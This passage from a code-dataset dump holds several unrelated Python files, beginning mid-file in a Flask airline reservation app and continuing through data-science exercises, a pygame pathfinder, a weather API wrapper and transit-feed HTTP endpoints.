redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_bar_chart', methods=['GET'])\ndef 
staff_view_monthly_sales():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        airline = session['employer']\n\n        monthly_sales, start_month = staff_view_tickets_sold_monthly(airline, mysql)\n        year = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n                'August', 'September', 'October', 'November', 'December']\n        labels = year[(start_month - 1):]\n        labels.extend(year[:(start_month - 1)])\n\n        return render_template('staff_chart.html', data=monthly_sales, months=labels)\n\n    return redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_revenue')\ndef staff_view_revenue():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n\n        airline = session['employer']\n        _, m_revenue = staff_view_revenue_pastmonth(airline, mysql)\n        _, y_revenue = staff_view_revenue_pastyear(airline, mysql)\n        m_revenue = round(m_revenue[0][0], 2)\n        y_revenue = round(y_revenue[0][0], 2)\n\n        return render_template('staff_view_revenue.html', m_revenue=m_revenue, y_revenue=y_revenue)\n\n    return redirect(url_for(\"login_staff\"))\n\n\n### CUSTOMER USE CASES ###\n@app.route('/customer_view_flight', methods=[\"POST\", \"GET\"])\ndef customer_view_flight():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        s_date = None\n        e_date = None\n        a_org = None\n        a_dest = None\n        c_org = None\n        c_dest = None\n        flights = []\n\n        try:\n            s_date = request.form['after']\n            e_date = request.form['before']\n            a_org = request.form['source']\n            a_dest = request.form['destination']\n            c_org = request.form['s_city']\n            c_dest = request.form['d_city']\n        except:\n            pass\n\n        if not parse_input([s_date,e_date,a_org,a_dest,c_org,c_dest]):\n            return render_template('customer_view_flights.html')\n\n        if not (check_datetime_format(s_date) and check_datetime_format(e_date)):\n            error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n            return render_template('customer_view_flights.html', error=error)\n\n        email = session['username']\n        headings, data = customer_view_my_flights(email, mysql, START_DATE=s_date, END_DATE=e_date,\n                                                  AP_ORIGIN=a_org, AP_DEST=a_dest, CITY_ORIGIN=c_org, CITY_DEST=c_dest)\n        return render_template('customer_view_flights.html', headings=headings, data=data)\n    else:\n        return redirect('/')\n\n@app.route('/customer_search_flight')\ndef customer_search_flight():\n    return redirect(url_for(\"public_info\"))\n\n@app.route('/customer_init_purchase', methods=[\"POST\", \"GET\"])\ndef customer_init_purchase():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        headings, data = public_view_oneway_flights(mysql)\n        return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n    return redirect(url_for('login_customer'))\n\n\n# DOES NOT HANDLE two-way flights\n@app.route('/customer_purchase_search_flights', methods=[\"POST\", \"GET\"])\ndef customer_purchase_search_flights():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        c_org = None\n        c_dest = None\n        a_org = None\n        a_dest = None\n        dept_dt = None\n        return_dt = None\n        headings = []\n        data = []\n\n        try:\n            c_org = request.form['city_origin']\n            c_dest = request.form['city_dest']\n            a_org = request.form['airport_origin']\n            a_dest = request.form['airport_dest']\n            dept_dt = request.form['dept_dt']\n            return_dt = request.form['return_dt']\n        except:\n            pass\n\n        if not parse_input([c_org, c_dest, a_org, a_dest, dept_dt, return_dt]):\n            return render_template('customer_purchase_flight.html', headings=headings, 
data=data)\n\n        if not (check_datetime_format(dept_dt) and check_datetime_format(return_dt)):\n            error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n            return render_template('customer_purchase_flight.html', headings=headings, data=data, error=error)\n\n        headings, data = public_view_oneway_flights(mysql, CITY_ORIGIN=c_org, CITY_DEST=c_dest, AP_ORIGIN=a_org,\n                                                    AP_DEST=a_dest, START_DATE=dept_dt, END_DATE=return_dt)\n        return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n    return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_stage_purchase/<flight_number>/<airline>/<dept_dt>/<base_price>',\n           methods=[\"POST\", \"GET\"])\ndef customer_stage_purchase(flight_number, airline, dept_dt, base_price):\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        #clean_dt = dept_dt[0:4] + dept_dt[5:7] + dept_dt[8:10]\n\n        sp=get_sold_price(flight_number,airline,dept_dt,base_price,mysql)\n        if sp is None:\n            error='Failed to purchase ticket. Flight capacity full.'\n            return render_template('customer_stage_purchase.html', error=error)\n        heading=('Final Price')\n        data=(str(sp))\n        flight_data = [flight_number,airline,dept_dt,base_price,sp]\n        return render_template('customer_stage_purchase.html', flight_data=flight_data, header=heading, data=data)\n\n    return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_confirm_purchase/<flight_number>/<airline>/<dept_dt>/<base_price>',\n           methods=[\"POST\", \"GET\"])\ndef customer_confirm_purchase(flight_number, airline, dept_dt, base_price):\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        cc_num = None\n        cc_expr = None\n        cc_name = None\n        cc_type = None\n        sold_price = None\n        flight_data=[]\n        try:\n            cc_num = request.form['cc_num']\n            cc_expr = request.form['cc_expr']\n            cc_name = request.form['cc_name']\n            cc_type = request.form['cc_type']\n        except:\n            error = 'Bad Inputs'\n            return render_template('customer_stage_purchase.html', error=error)\n\n        if not parse_input( [cc_num,cc_expr,cc_name,cc_type] ):\n            error = 'Bad inputs'\n            return render_template('customer_stage_purchase.html', error=error)\n\n        if cc_type not in ['credit', 'debit']:\n            error = \"Bad inputs. 
Card type must be 'credit' or 'debit'\"\n            return render_template('customer_stage_purchase.html', error=error)\n\n        email = session['username']\n\n        sold_price = get_sold_price(flight_number, airline, dept_dt, base_price, mysql)\n        customer_purchase_ticket(flight_number, airline, dept_dt, sold_price, base_price, cc_num, cc_expr, cc_name,\n                                 cc_type, email, mysql)\n        flight_data = [flight_number, airline, dept_dt, base_price, sold_price]\n        return render_template('customer_stage_purchase.html', confirmation=' Purchase Created', flight_data=flight_data)\n\n    return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_init_delete', methods=[\"POST\", \"GET\"])\ndef customer_init_delete():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        email = session['username']\n        headings, data = customer_view_my_flights(email, mysql)\n        return render_template('customer_delete_flight.html', headings=headings, data=data)\n\n    return redirect(url_for('login_customer'))\n\n@app.route('/customer_delete_search_flights', methods=[\"POST\", \"GET\"])\ndef customer_delete_search_flights():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        c_org = None\n        c_dest = None\n        a_org = None\n        a_dest = None\n        dept_dt = None\n        return_dt = None\n        headings = []\n        data = []\n\n        try:\n            c_org = request.form['city_origin']\n            c_dest = request.form['city_dest']\n            a_org = request.form['airport_origin']\n            a_dest = request.form['airport_dest']\n            dept_dt = request.form['dept_dt']\n            return_dt = request.form['return_dt']\n        except:\n            pass\n\n        if not parse_input([c_org, c_dest, a_org, a_dest, dept_dt, return_dt]):\n            return render_template('customer_purchase_flight.html', headings=headings, data=data)\n\n        if not (check_datetime_format(dept_dt) and check_datetime_format(return_dt)):\n            error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n            return render_template('customer_purchase_flight.html', headings=headings, data=data, error=error)\n\n        email = session['username']\n        headings, data = customer_view_my_flights(email, mysql, START_DATE=dept_dt, END_DATE=return_dt,\n                                                  AP_ORIGIN=a_org, AP_DEST=a_dest, CITY_ORIGIN=c_org, CITY_DEST=c_dest)\n        return render_template('customer_delete_flight.html', headings=headings, data=data)\n\n    return redirect(url_for(\"login_customer\"))\n\n@app.route('/customer_confirm_delete/<ticket_id>', methods=[\"POST\", \"GET\"])\ndef customer_confirm_delete(ticket_id):\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        email = session['username']\n        customer_cancel_ticket(email, ticket_id, mysql)\n        return redirect(url_for(\"customer_init_delete\"))\n\n    return redirect(url_for(\"login_customer\"))\n\n\n@app.route('/customer_spending', methods=[\"POST\", \"GET\"])\ndef customer_spending():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        email = session['username']\n        headings, data = customer_view_spending_pastyear(email, mysql)\n        return render_template('customer_spending.html', headings=headings, data=data)\n\n    return redirect(url_for('login_customer'))\n\n@app.route('/customer_spending_search', methods=[\"POST\", \"GET\"])\ndef customer_spending_search():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        s_date = datetime_in_X_days(-365)\n        e_date = datetime_in_X_days(0)\n\n        try:\n            s_date = request.form['before']\n            e_date = request.form['after']\n        except:\n            pass\n\n        if not parse_input( [s_date, e_date] ):\n            error = 'Bad Inputs'\n            return 
render_template('customer_spending.html', error=error)\n\n        if not (check_datetime_format(s_date) and check_datetime_format(e_date)):\n            error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n            return render_template('customer_spending.html', error=error)\n\n        email = session['username']\n        headings, data = customer_view_spending_interval(email, s_date, e_date, mysql)\n\n        # only shows bar chart if 2 dates entered\n        if s_date != \"\" and e_date != \"\" and s_date is not None and e_date is not None:\n            s_date = datetime.datetime.strptime(s_date[:20], '%Y-%m-%d %H:%M:%S')\n            e_date = datetime.datetime.strptime(e_date[:20], '%Y-%m-%d %H:%M:%S')\n            b_labels = spending_barchart_labels(s_date.month, e_date.month)\n            monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n            return render_template('customer_spending.html', headings=headings, data=data,\n                                   months=b_labels, b_data=monthly_s)\n\n        return render_template('customer_spending.html', headings=headings, data=data)\n        #data = round(data, 2)\n\n    return redirect(url_for('login_customer'))\n\n\n@app.route('/customer_spending_6months', methods=[\"POST\", \"GET\"])\ndef customer_spending_6months():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        email = session['username']\n        headings, data = customer_view_spending_past6months(email, mysql)\n        #data = round(data, 2)\n\n        today = datetime.datetime.today() # bar chart data\n        e_date = today\n        s_date = today.replace(year=(today.year - 1), day=1)\n        for i in range(6):\n            s_date = increment_dt_month(s_date)\n        b_labels = spending_barchart_labels(s_date.month, e_date.month)\n        monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n        return render_template('customer_spending.html', headings=headings, data=data,\n                               months=b_labels, b_data=monthly_s)\n\n    return redirect(url_for('login_customer'))\n\n@app.route('/customer_spending_year', methods=[\"POST\", \"GET\"])\ndef customer_spending_year():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        email = session['username']\n        headings, data = customer_view_spending_pastyear(email, mysql)\n        #data = round(data, 2)\n\n        today = datetime.datetime.today() # bar chart\n        e_date = today\n        s_date = today.replace(year=(today.year - 1), day=1)\n        b_labels = spending_barchart_labels(s_date.month, e_date.month)\n        monthly_s = customer_spending_monthly(email, s_date, e_date, mysql)\n\n        return render_template('customer_spending.html', headings=headings, data=data,\n                               months=b_labels, b_data=monthly_s)\n\n    return redirect(url_for('login_customer'))\n\n\n@app.route('/customer_rate_and_comment', methods=[\"POST\", \"GET\"])\ndef customer_rate_and_comment():\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n\n        email = session['username']\n        r_headings, r_data = customer_view_review(email, mysql)\n\n        today = datetime_in_X_days(0)\n        f_headings, f_data = customer_view_my_flights(email, mysql, END_DATE=today)\n\n        return render_template('customer_rate_and_comment.html',\n                               r_headings=r_headings, r_data=r_data,\n                               f_headings=f_headings, f_data=f_data)\n\n    return redirect(url_for('login_customer'))\n\n@app.route('/customer_stage_rate_and_comment/<ticket_id>', methods=[\"POST\", \"GET\"])\ndef customer_stage_rate_and_comment(ticket_id):\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        return render_template('customer_stage_rate_and_comment.html', ticket_id=ticket_id)\n    return 
redirect(url_for(\"login_customer\"))\n\n\n@app.route('/customer_create_rate_and_comment/<ticket_id>', methods=[\"POST\", \"GET\"])\ndef customer_create_rate_and_comment(ticket_id):\n    c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n    if c_logged:\n        rating = None\n        comment = None\n\n        try:\n            rating = request.form['rating']\n            comment = request.form['comment']\n        except:\n            error = 'Bad Inputs'\n            return render_template('customer_stage_rate_and_comment.html', error=error)\n\n        if rating not in ['1','2','3','4','5']:\n            error = 'Rating must be 1-5'\n            return render_template('customer_stage_rate_and_comment.html', error=error)\n\n        if len(comment) > 400:\n            error = 'Comment cannot be more than 400 char'\n            return render_template('customer_stage_rate_and_comment.html', error=error)\n\n        email = session['username']\n        try:\n            customer_create_review(email, ticket_id, rating, comment, mysql)\n        except:\n            pass\n\n        return redirect(url_for('customer_rate_and_comment'))\n\n    return redirect(url_for('login_customer'))\n\n\n\napp.secret_key = 'some key that you will never guess'\n# Run the app on localhost port 5000\n# debug = True -> you don't have to restart flask\n# for changes to go through, TURN OFF FOR PRODUCTION\nif __name__ == \"__main__\":\n    app.run('127.0.0.1', 5000, debug=True)\n\n\n","repo_name":"Junming-Qiu/AirlineReservation","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":39212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"12372632791","text":"# proprietary to BEERA // DO NOT COPY\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nfrom time import sleep\nimport seaborn as sns\nimport numpy as np 
\n\n\n\n\ndf = pd.read_csv('100_Sales_Records.csv', parse_dates=[5, 7])\ndf = df[df['Sales Channel'] == 'Online']\n\ndf = df[['Order Priority', 'Order Date', 'Ship Date']]\n\ndf['diff'] = df['Ship Date'] - df['Order Date']\n\n\ndef defff(row):\n\ta = int(row['diff'].days)\n\tif row['Ship Date'].year >= 2013: a -= 3\n\tif row['Ship Date'].year == 2014: a -= 6\n\tif row['Ship Date'].year >= 2014: a -= 6\n\tif row['Ship Date'].year >= 2015: a -= 2\n\tif row['Ship Date'].year >= 2016: a -= 3\n\treturn a\n\n\ndf = df.sort_values('Ship Date',ascending=True)\n# df['diff'] = str(df['diff'])\n# print(df)\ndf['deff'] = 0\n\n# for index, row in df.iterrows():\n# \trow['deff'] = int(row['diff'].days)\n# \tprint(int(row['diff'].days))\n# print(df)\n\ndf['deff'] = df.apply(defff, axis = 1)\n# print(df)\n\ndf.to_csv('priorty.csv')\nexit()\nprint(df)\n\n# df = df.sort_values('diff',ascending=True)\nplt.figure()\n\nplt.plot(df['Ship Date'], df['deff'])\n\nplt.show()\n","repo_name":"sreeram315/Trash---To-keep-this-space-clean","sub_path":"data_science_class/deving/prior.py","file_name":"prior.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"299901940","text":"import pygame\nimport game_constants as gc\nimport illustrator\nfrom graph import Graph\nfrom problem import Problem\n\nquit_game = lambda event: event.type == pygame.QUIT\nleft_mouse_pressed = lambda: pygame.mouse.get_pressed()[0]\nright_mouse_pressed = lambda: pygame.mouse.get_pressed()[2]\n\ndef main(search_agent_init):\n    graph = Graph()\n    start_state = None\n    goal_state = None\n    run = True\n\n    while run:\n        illustrator.draw(gc.WIN, graph)\n\n        for event in pygame.event.get():\n            if quit_game(event):\n                run = False\n\n            if 
left_mouse_pressed():\n                pos = pygame.mouse.get_pos()\n                row, col = graph.get_clicked_pos(pos)\n                node = graph.matrix[row][col]\n\n                if not start_state and node != goal_state:\n                    start_state = node\n                    start_state.make_start()\n\n                elif not goal_state and node != start_state:\n                    goal_state = node\n                    goal_state.make_goal()\n\n                elif node != goal_state and node != start_state:\n                    node.make_barrier()\n\n                illustrator.draw(gc.WIN, graph)\n            elif right_mouse_pressed():\n                pos = pygame.mouse.get_pos()\n                row, col = graph.get_clicked_pos(pos)\n                node = graph.matrix[row][col]\n                node.reset()\n\n                if node == start_state:\n                    start_state = None\n                elif node == goal_state:\n                    goal_state = None\n\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_SPACE and start_state and goal_state:\n                    for row in graph.matrix:\n                        for node in row:\n                            node.update_neighbors(graph.matrix)\n\n                    problem = Problem(graph.matrix, start_state, goal_state)\n                    search_agent = search_agent_init(graph, problem)\n                    search_agent.algorithm()\n                    search_agent.walk_path()\n\n                if event.key == pygame.K_c:\n                    start_state = None\n                    goal_state = None\n                    graph = Graph()\n\n            keys = pygame.key.get_pressed() #checking pressed keys\n            if keys[pygame.K_LSHIFT]:\n                pos = pygame.mouse.get_pos()\n                row, col = graph.get_clicked_pos(pos)\n                node = graph.matrix[row][col]\n                node.make_medium_cost()\n\n            if keys[pygame.K_LALT]:\n                pos = pygame.mouse.get_pos()\n                row, col = graph.get_clicked_pos(pos)\n                node = graph.matrix[row][col]\n                node.make_high_cost()\n\n    pygame.quit()\n","repo_name":"aRod209/path-finders","sub_path":"path_finder.py","file_name":"path_finder.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22315937845","text":"import sys\n\nx1, y1, x2, y2 = map(int, sys.stdin.readline().split())\n\nif abs(x1-x2) == 0:\n    d = abs(y1-y2)\n    print(x1+d, y1, x1+d, y2, sep=' ')\nelif abs(y1-y2) == 0:\n    d = abs(x1-x2)\n    print(x1, y1+d, x2, y2+d, sep=' ')\nelif abs(x1-x2) == abs(y1-y2):\n    print(x1, y2, x2, y1, sep=' ')\nelse:\n    print(\"-1\")\n","repo_name":"guzhoudiaoke/practice","sub_path":"codeforces/459A/py/459a.py","file_name":"459a.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"2193446651","text":"# Prime numbers are numbers that are divisible only by 1 and by themselves. \n# For example, 13 is prime because 13 divides evenly only by 13 and by 1, \n# and is not evenly divisible by any other number.\n# 4 is not prime because 4 divides evenly by itself and also by 2 and 1.\n# For a prime number you have to check which numbers the given number is divisible by. \n# You can do that by running a loop.\n#(FOR LOOP QUESTION)\ncounter=1\nwhile counter<=100:\n    user_input=int(input(\"enter a value\"))\n    # trial division: a number greater than 1 is prime if no number from 2 to n-1 divides it\n    is_prime=user_input>1\n    for divisor in range(2,user_input):\n        if user_input%divisor==0:\n            is_prime=False\n            break\n    if is_prime:\n        print(\"It's a prime number\")\n    else:\n        print(\"It's a composite number\")\n    counter+=1\n ","repo_name":"BhagyashreeKarale/loop","sub_path":"18set2ques7.py","file_name":"18set2ques7.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4230691243","text":"try:\n    from secrets import weather_api_key\nexcept ImportError:\n    print(\"WEATHER API ERROR. NO SECRETS FILE DETECTED. CREATE secrets.py THEN ADD weather_api_key STRING\")\nexcept FileNotFoundError:\n    print(\"WEATHER API ERROR. NO SECRETS FILE DETECTED. 
CREATE secrets.py THEN ADD weather_api_key STRING\")\n\nimport requests\nimport json\n\n\nclass Weather:\n \"\"\"This class represents the weather which is fetched from the openweathermap API\"\"\"\n\n def __init__(self, city_name):\n \"\"\"Initialises the object and sets the object city_name.\n\n Keyword arguments:\n city_name -- the current city the device is in i.e. Cardiff, London etc\n \"\"\"\n self.city_name = city_name\n self.read_weather()\n\n def create_celcius_temp(self):\n \"\"\"Converts object's kelvin value to celcius\"\"\"\n raw_celcius = (self.kelvin_temp - 273.15)\n formatted_celcius = round(raw_celcius, 2)\n self.set_ceclius_temp(formatted_celcius)\n\n def read_weather(self):\n \"\"\"Requests data from the open weather api. Requires secret to be defined in a secrets.py file\"\"\"\n\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n\n complete_url = base_url + \"appid=\" + weather_api_key + \"&q=\" + self.city_name\n\n response = requests.get(complete_url)\n\n pretty_json = response.json()\n self.pretty_json = pretty_json\n\n try:\n\n main_data = pretty_json[\"main\"]\n\n current_temperature_kelvin = main_data[\"temp\"]\n\n self.set_kelvin_temp(current_temperature_kelvin)\n self.create_celcius_temp()\n self.set_weather_description(\n pretty_json[\"weather\"][0]['description'])\n\n except KeyError:\n\n error_code = str(pretty_json[\"cod\"])\n\n if error_code == '404':\n\n print(\" --- City Not Found --- \")\n\n if error_code == '401':\n\n print(\" --- API KEY ERROR --- \")\n\n else:\n print(\"UNKNOWN ERROR CODE\")\n\n def get_ceclius_temp(self):\n \"\"\"Gets the temp of weather in celcius\"\"\"\n return self.celcius_temp\n\n def get_kelvin_temp(self):\n \"\"\"Gets the temp of weather in kelvin\"\"\"\n return self.kelvin_temp\n\n def get_weather_description(self):\n \"\"\"Gets description of the weather\"\"\"\n return self.weather_description\n\n def set_ceclius_temp(self, c):\n \"\"\"Sets the temp of weather in celcius\"\"\"\n self.celcius_temp = c\n\n def set_kelvin_temp(self, k):\n \"\"\"Sets the temp of weather in kelvin\"\"\"\n self.kelvin_temp = k\n\n def set_weather_description(self, description):\n \"\"\"Sets description of the weather\"\"\"\n self.weather_description = description\n","repo_name":"gowhale/room-temperature-visualization","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037689942","text":"\"\"\"\nFeeds\n\nEndpoints for getting information on feeds and for triggering feed updates.\n\"\"\"\n\nimport flask\nfrom flask import Blueprint\n\nfrom transiter.http.httpmanager import (\n http_endpoint,\n link_target,\n HttpMethod,\n HttpStatus,\n is_sync_request,\n)\nfrom transiter import exceptions\nfrom transiter.http.permissions import requires_permissions, PermissionsLevel\nfrom transiter.services import feedservice, views\n\nfeed_endpoints = Blueprint(__name__, __name__)\n\n\n@http_endpoint(feed_endpoints, \"\")\n@link_target(views.FeedsInSystem, [\"_system_id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef list_all_in_system(system_id):\n \"\"\"\n List feeds in a system\n\n List all the feeds in a transit system.\n\n Return code | Description\n ----------------|-------------\n `200 OK` | Returned if the system with this ID exists.\n `404 NOT FOUND` | Returned if no system with the provided ID is installed.\n \"\"\"\n return 
feedservice.list_all_in_system(system_id)\n\n\n@http_endpoint(feed_endpoints, \"/<feed_id>\")\n@link_target(views.Feed, [\"_system_id\", \"id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef get_in_system_by_id(system_id, feed_id):\n    \"\"\"\n    Get a feed in a system\n\n    Describe a feed in a transit system.\n\n    Return code         | Description\n    --------------------|-------------\n    `200 OK`            | Returned if the system and feed exist.\n    `404 NOT FOUND`     | Returned if either the system or the feed does not exist.\n    \"\"\"\n    return feedservice.get_in_system_by_id(system_id, feed_id)\n\n\n@http_endpoint(feed_endpoints, \"/<feed_id>\", method=HttpMethod.POST)\n@requires_permissions(PermissionsLevel.ALL)\ndef create_feed_update(system_id, feed_id):\n    \"\"\"\n    Perform a feed update\n\n    Perform a feed update of the given feed.\n    The response is a description of the feed update.\n\n    This endpoint is provided for one-off feed updates and development work.\n    In general feed updates should instead be scheduled periodically using the transit system configuration;\n    see the [transit system documentation](systems.md) for more information.\n\n    Return code         | Description\n    --------------------|-------------\n    `201 CREATED`       | Returned if the system and feed exist, in which case the update is _scheduled_ (and executed in the same thread, if sync).\n    `404 NOT FOUND`     | Returned if either the system or the feed does not exist.\n    \"\"\"\n    user_provided_content = flask.request.files.get(\"content\")\n    if user_provided_content is not None:\n        user_provided_content = user_provided_content.read()\n        if len(user_provided_content) == 0:\n            raise exceptions.InvalidInput(\"No file or an empty file provided.\")\n        if not is_sync_request():\n            raise exceptions.InvalidInput(\n                \"Feed updates with content provided must be run synchronously. 
\"\n            \"Use the sync=true url parameter.\"\n        )\n    feed_update_pk = feedservice.create_and_execute_feed_update(\n        system_id,\n        feed_id,\n        execute_async=not is_sync_request(),\n        content=user_provided_content,\n    )\n    return (\n        feedservice.get_update_in_feed_by_pk(system_id, feed_id, feed_update_pk),\n        HttpStatus.CREATED,\n    )\n\n\n@http_endpoint(feed_endpoints, \"//flush\", method=HttpMethod.POST)\n@requires_permissions(PermissionsLevel.ALL)\ndef create_feed_update_flush(system_id, feed_id):\n    \"\"\"\n    Perform a feed flush\n\n    The feed flush operation removes all entities from Transiter\n    that were added through updates for the given feed.\n    The operation is useful for removing stale data from the database.\n\n    Return code         | Description\n    --------------------|-------------\n    `201 CREATED`       | Returned if the system and feed exist, in which case the flush is _scheduled_ (and executed in the same thread, if sync).\n    `404 NOT FOUND`     | Returned if either the system or the feed does not exist.\n    \"\"\"\n    feed_update_pk = feedservice.create_and_execute_feed_flush(\n        system_id, feed_id, execute_async=not is_sync_request()\n    )\n    return (\n        feedservice.get_update_in_feed_by_pk(system_id, feed_id, feed_update_pk),\n        HttpStatus.CREATED,\n    )\n\n\n@http_endpoint(feed_endpoints, \"//updates\")\n@link_target(views.UpdatesInFeedLink, [\"_system_id\", \"_feed_id\"])\n@requires_permissions(PermissionsLevel.ADMIN_READ)\ndef list_updates_in_feed(system_id, feed_id):\n    \"\"\"\n    List updates for a feed\n\n    List the most recent updates for a feed.\n    Up to one hundred updates will be listed.\n\n    Return code         | Description\n    --------------------|-------------\n    `200 OK`            | Returned if the system and feed exist.\n    `404 NOT FOUND`     | Returned if either the system or the feed does not exist.\n    \"\"\"\n    return feedservice.list_updates_in_feed(system_id, feed_id)\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/http/endpoints/feedendpoints.py","file_name":"feedendpoints.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15034288255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 28 23:58:17 2016\n\n@author: phucn_000\n\"\"\"\n\n\"\"\"\nSpyder Editor\n\nThis is my submission to Machine Learning Course on Coursera.\nIt is largely based on the sample code provided in the course.
\nI changed the dataset and set the number of trees to 30.\nI also had to use write_pdf instead of create_png to create the output.\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nimport sklearn.metrics\n# Feature Importance\nfrom sklearn.ensemble import ExtraTreesClassifier\n\nos.chdir(r\"C:\Machine_learning\")\n\n# Load the dataset\n\nAH_data = pd.read_csv(\"addhealth_pds.csv\")\ndata_clean = AH_data.dropna()\n\ndata_clean.dtypes\ndata_clean.describe()\n\n# Split into training and testing sets\n\npredictors = data_clean[['BIO_SEX','H1GI4','H1GI5A','H1GI5B']]\npredictors.dtypes\ntargets = data_clean.SCH_YR\n\npred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.3)\n\npred_train.shape\npred_test.shape\ntar_train.shape\ntar_test.shape\n\n# Build model on training data\nfrom sklearn.ensemble import RandomForestClassifier\n\nclassifier = RandomForestClassifier(n_estimators=30)\nclassifier = classifier.fit(pred_train, tar_train)\n\npredictions = classifier.predict(pred_test)\n\nsklearn.metrics.confusion_matrix(tar_test, predictions)\nsklearn.metrics.accuracy_score(tar_test, predictions)\n\n\n# fit an Extra Trees model to the data\nmodel = ExtraTreesClassifier()\nmodel.fit(pred_train, tar_train)\n\n\nprint(model.feature_importances_)\n\"\"\" [ 0.47544108  0.16881172  0.16961701  0.18613019]\ndisplay the relative importance of each attribute, correspondingly BIO_SEX, H1GI4, H1GI5A, H1GI5B\n\"\"\"\n\n\"\"\"\nRunning a different number of trees and seeing the effect\nof that on the accuracy of the prediction\n\"\"\"\n\ntrees = range(1, 31)\naccuracy = np.zeros(len(trees))\n\nfor idx in range(len(trees)):\n    classifier = RandomForestClassifier(n_estimators=trees[idx])\n    classifier = classifier.fit(pred_train, tar_train)\n    predictions = classifier.predict(pred_test)\n    accuracy[idx] = sklearn.metrics.accuracy_score(tar_test, predictions)\n\nplt.cla()\ngraph = plt.plot(trees, accuracy)\n\n\"\"\"\nThis plot shows that the accuracy peaks at a small number of trees.\nBeyond that, adding more trees gives roughly equal or slightly lower accuracy (higher test error).\n\"\"\"\n","repo_name":"minhsphuc12/edX_AnalyticsEdge","sub_path":"Assignment2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"39682002369","text":"import matplotlib.pyplot as plt\nimport time\n\n\n# There's technically no init function, so we can make some global variables here:\nlevel_name = \"to show that we have an initial value\"\n\n# We can access these global variables from the functions below.\n\ndef new_level(data, debug_print):\n    # You might want to create some kind of global dictionary to store the current level.\n    debug_print(level_name)\n\n    # Visualizing the current level/screen as a scatter plot (assuming you have the matplotlib library):\n    solids = data[\"levelData\"][\"solids\"]\n\n    # Just so you see how coordinates are set up:\n    debug_print(data[\"levelData\"][\"levelOffset\"], data[\"levelData\"][\"levelSize\"])\n    debug_print(solids[0], solids[1], solids[2])\n    \n    x = []\n    y = []\n    for coords in solids:\n        x.append(coords[0])\n        y.append(-coords[1])\n    # We can also add the goal, just so we can see where we need to go:\n    x.append(data[\"levelData\"][\"goal\"][0])\n    y.append(-data[\"levelData\"][\"goal\"][1])\n    plt.scatter(x,y)\n    plt.plot()\n    # This is saved into your Celeste Directory/level.png\n    plt.savefig(\"level.png\")\n    
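# Clear the figure state so the next level's plot starts from a blank canvas.\n    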
